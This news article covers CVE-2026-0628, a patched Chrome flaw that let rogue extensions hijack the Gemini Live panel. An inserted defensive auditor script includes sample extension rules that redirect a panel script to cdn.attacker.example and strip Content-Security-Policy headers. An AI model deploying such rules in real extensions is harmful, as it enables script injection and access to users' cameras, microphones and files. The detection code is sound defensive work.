
Chrome Gemini panel became privilege escalator for rogue extensions


High-severity flaw let malicious add-ons access system via browser's embedded AI feature

Security boffins have discovered a high-severity bug in Google Chrome that allowed malicious extensions to hijack its Gemini Live AI panel and inherit privileges they were never meant to have.

The flaw, tracked as CVE-2026-0628, was uncovered by researchers at Palo Alto Networks' Unit 42 who found that rogue Chrome extensions could manipulate how the browser handled requests to the embedded Gemini Live side panel. By exploiting the way Chrome handles extension network rules, a malicious add-on with fairly standard permissions could intercept and tamper with traffic headed for the Gemini panel, slipping its own JavaScript into a far more trusted part of the browser.
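The mechanism the article describes, an extension using Chrome's extension network rules (the declarativeNetRequest API) to rewrite traffic for a privileged page, is also something a defender can look for in an extension's ruleset. What follows is an added example, not code from the article or from Unit 42: a small offline auditor that loads a declarativeNetRequest static ruleset and flags rules whose action can change what a page receives (redirect or modifyHeaders) and whose condition reaches a URL on an origin you treat as privileged. The host names, sample rules and probe URLs are constructed for illustration; the article does not say which origins the Gemini side panel loads from, so gemini.google.com below is an assumption, not a fact from the report.

```javascript
// Added example, not code from the article or from Unit 42: an offline auditor
// for a Chrome extension's declarativeNetRequest (DNR) static ruleset. It flags
// rules that can rewrite traffic (redirect or modifyHeaders) and whose condition
// matches a URL on an origin you consider privileged.
// Host names, URLs and rules below are constructed for illustration; the
// article does not say which origins the Gemini side panel actually loads from.

// Convert a DNR urlFilter into a RegExp. Simplified rendering of the documented
// pattern syntax:
//   ||host   any scheme, then host or any subdomain of host
//   |text    anchored at the start of the URL; text| anchored at the end
//   *        any run of characters
//   ^        a separator (anything but letters, digits, _ - . %) or end of URL
function urlFilterToRegExp(filter) {
  let body = filter;
  let prefix = "";
  let suffix = "";
  if (body.startsWith("||")) {
    prefix = "^[a-z][a-z0-9+.-]*://([^/?#]*\\.)?";
    body = body.slice(2);
  } else if (body.startsWith("|")) {
    prefix = "^";
    body = body.slice(1);
  }
  if (body.endsWith("|")) {
    suffix = "$";
    body = body.slice(0, -1);
  }
  const pattern = Array.from(body, (ch) => {
    if (ch === "*") return ".*";
    if (ch === "^") return "(?:[^a-zA-Z0-9_\\-.%]|$)";
    return ch.replace(/[.+?()[\]{}\\|$]/, "\\$&");
  }).join("");
  return new RegExp(prefix + pattern + suffix, "i");
}

// Does this rule's condition select the given URL? A condition with no
// urlFilter, regexFilter or requestDomains matches every request, which is
// exactly the kind of over-broad rule an auditor should notice.
function ruleMatchesUrl(rule, url) {
  const cond = rule.condition || {};
  const host = new URL(url).hostname;
  if (cond.requestDomains &&
      !cond.requestDomains.some((d) => host === d || host.endsWith("." + d))) {
    return false;
  }
  if (cond.urlFilter && !urlFilterToRegExp(cond.urlFilter).test(url)) return false;
  if (cond.regexFilter && !new RegExp(cond.regexFilter).test(url)) return false;
  return true;
}

// Action types that change what a page receives rather than just blocking it.
const REWRITING_ACTIONS = new Set(["redirect", "modifyHeaders"]);

// Return one finding per rewriting rule that reaches any of the sensitive URLs.
function auditRuleset(rules, sensitiveUrls) {
  const findings = [];
  for (const rule of rules) {
    const type = rule.action && rule.action.type;
    if (!REWRITING_ACTIONS.has(type)) continue;
    const matched = sensitiveUrls.filter((u) => ruleMatchesUrl(rule, u));
    if (matched.length > 0) {
      findings.push({ id: rule.id, action: type, matched, condition: rule.condition });
    }
  }
  return findings;
}

// Constructed sample ruleset, in the shape of a DNR rules JSON file.
const SAMPLE_RULES = [
  // Ordinary content blocking: a block action cannot inject anything.
  { id: 1, priority: 1, action: { type: "block" },
    condition: { urlFilter: "||ads.example.net^" } },
  // Swaps a script loaded by the assumed panel origin for one on another host.
  { id: 2, priority: 2,
    action: { type: "redirect", redirect: { url: "https://cdn.attacker.example/panel.js" } },
    condition: { urlFilter: "||gemini.google.com/static/*.js", resourceTypes: ["script"] } },
  // Strips CSP from every document response; no URL filter at all.
  { id: 3, priority: 1,
    action: { type: "modifyHeaders",
              responseHeaders: [{ header: "content-security-policy", operation: "remove" }] },
    condition: { resourceTypes: ["main_frame", "sub_frame"] } },
  // Header rewrite scoped to the extension vendor's own API; not flagged.
  { id: 4, priority: 1,
    action: { type: "modifyHeaders",
              requestHeaders: [{ header: "x-client", operation: "set", value: "ext" }] },
    condition: { requestDomains: ["api.vendor.example"] } },
];

// Assumed privileged URLs to probe with; substitute the origins you care about.
const SENSITIVE_URLS = [
  "https://gemini.google.com/static/app.js",
  "https://gemini.google.com/app",
];

console.log(JSON.stringify(auditRuleset(SAMPLE_RULES, SENSITIVE_URLS), null, 2));
```

Run it with node; on the constructed data it reports rules 2 and 3, and not rule 4, because a header rewrite confined to the vendor's own domain never reaches the probe URLs. To audit a real extension, read the manifest's `declarative_net_request.rule_resources` entries, parse each referenced JSON file and pass the array to `auditRuleset` with the origins you treat as privileged. Rules added dynamically at runtime are not in those files, so this check covers only the static part of a ruleset.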

Gemini Live, built into Chrome as an interactive AI panel, isn't just a chatbot bolted onto a tab. It's tightly integrated into the browser to grab screenshots, read local files, and turn on your camera or microphone when asked. That's handy if you're using it as intended, but less so if a sketchy extension manages to ride along and inherit the same level of access, stepping well beyond the permissions add-ons are supposed to have.

"Since the Gemini app relies on performing actions for legitimate purposes, hijacking the Gemini panel allows privileged access to system resources that an extension would not normally have," said Gal Weizman, security researcher at Palo Alto Networks.

In effect, a malicious extension could have turned on a webcam or microphone, sifted through local files, taken screenshots, or slipped phishing messages into what appears to be a legitimate Gemini panel. Nothing particularly fancy was required – just ordinary extension behavior bumping up against a flaw in how Chrome walled off its AI feature.

Google fixed the bug in early January, shipping the patch in Chrome 143.0.7499.192 and 143.0.7499.193 for desktop via a Stable Channel update. The hole was closed before Unit 42 went public, so anyone on a current version is covered; chrome://settings/help shows the installed build and triggers an update check if you want to confirm. Even so, it's yet another example of how deeply integrating AI features with core software can quietly reshape the browser's threat model.

News of the bug comes after analyst firm Gartner advised most organizations to avoid so-called "agentic" browsers, arguing that AI-driven automation with deep system hooks introduces risks that outweigh the productivity upside for many enterprises.

It also follows fresh evidence that attackers are already experimenting with generative AI inside their tooling. In February, researchers detailed Android malware that tapped Google's Gemini model at runtime to help interpret screenshots and automate on-device actions, showing that criminals are just as keen as vendors to wire AI into sensitive parts of the stack.

For years, browser makers have tried to keep extensions boxed in so one bad download can't poke around your system. Add an AI helper that's allowed to read files and tap your mic on command, and things get messier. This bug is a fairly simple reminder: the more power you give software in the name of convenience, the more careful you have to be about who else might get their hands on it. ®
